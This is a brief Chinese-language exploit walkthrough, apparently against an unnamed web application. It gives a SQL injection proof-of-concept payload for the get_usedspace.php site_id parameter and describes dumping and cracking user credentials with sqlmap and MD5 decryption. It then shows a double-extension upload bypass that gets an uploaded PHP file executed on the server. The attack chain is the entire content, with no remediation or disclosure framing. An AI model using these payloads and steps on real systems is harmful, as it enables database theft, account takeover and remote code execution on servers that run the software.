1.我们来到登录页面
2. 我们使用poc,SQL注入漏洞点出在执行/webservice/get_usedspace.php?site_id=,执行的POC,得到回显old6old6old6,证明存在漏洞
poc: /webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x6f6c6436,0x6f6c6436,0x6f6c6436)--
3. 使用sqlmap进行账号密码发现,通过MD5解密即可得到密码
爆破数据库
爆破表名
获取用户名和密码
4.我们进行登录(SQL注入)
5. 进入后台→客户→点击客户→新建123客户→附件→新建附件→上传内容为phpinfo文件名为123.ma.php→点击123的名称
1.格式为xx.xx.php可绕过上传限制
2.内容:
<?php phpinfo();?>
6. 点击123.ma.php,即可解析phpinfo